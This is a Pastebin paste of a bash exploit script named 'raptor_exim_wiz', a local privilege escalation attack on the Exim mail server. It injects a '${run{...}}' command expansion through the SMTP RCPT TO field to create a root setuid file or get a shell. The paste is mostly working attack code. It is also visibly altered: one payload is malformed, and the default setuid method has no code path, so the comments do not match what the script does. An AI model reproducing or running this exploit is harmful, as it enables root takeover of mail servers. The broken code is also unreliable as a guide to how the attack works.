SHARE
TWEET

Untitled

a guest Jun 20th, 2019 63 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2. METHOD="setuid" # default method
  3. PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
  4. PAYLOAD_NETCAT='${run{\x2whoami\x22}}@localhost'
  5. # usage instructions
  6. function usage()
  7. {
  8.     echo "$0 [-m METHOD]"
  9.     echo "-m setuid : use the setuid payload (default)"
  10.     echo "-m netcat : use the netcat payload"
  11.     exit 1
  12. }
  13. # payload delivery
  14. function exploit()
  15. {
  16.     # connect to localhost:25
  17.     exec 3<>/dev/tcp/localhost/25
  18.     # deliver the payload
  19.     read -u 3 && echo $REPLY
  20.     echo "helo localhost" >&3
  21.     read -u 3 && echo $REPLY
  22.     echo "mail from:<>" >&3
  23.     read -u 3 && echo $REPLY
  24.     echo "rcpt to:<$PAYLOAD>" >&3
  25.     read -u 3 && echo $REPLY
  26.     echo "data" >&3
  27.     read -u 3 && echo $REPLY
  28.     for i in {1..31}
  29.     do
  30.         echo "Received: $i" >&3
  31.     done
  32.     echo "." >&3
  33.     read -u 3 && echo $REPLY
  34.     echo "quit" >&3
  35.     read -u 3 && echo $REPLY
  36. }
  37. # print banner
  38. echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
  39. echo 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>'
  40. # parse command line
  41. while [ ! -z "$1" ]; do
  42.     case $1 in
  43.         -m) shift; METHOD="$1"; shift;;
  44.         * ) usage
  45.         ;;
  46.     esac
  47. done
  48. if [ -z $METHOD ]; then
  49.     usage
  50. fi
  51.  
  52. if [ $METHOD = "netcat" ]; then
  53.     # select and deliver the payload
  54.     echo "Delivering $METHOD payload..."
  55.     PAYLOAD=$PAYLOAD_NETCAT
  56.     exploit
  57.     # wait for the magic to happen and spawn our shell
  58.     echo "Waiting 5 seconds..."
  59.     sleep 5
  60.     nc -v 127.0.0.1 31337
  61. # print help
  62. else
  63.     usage
  64. fi
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top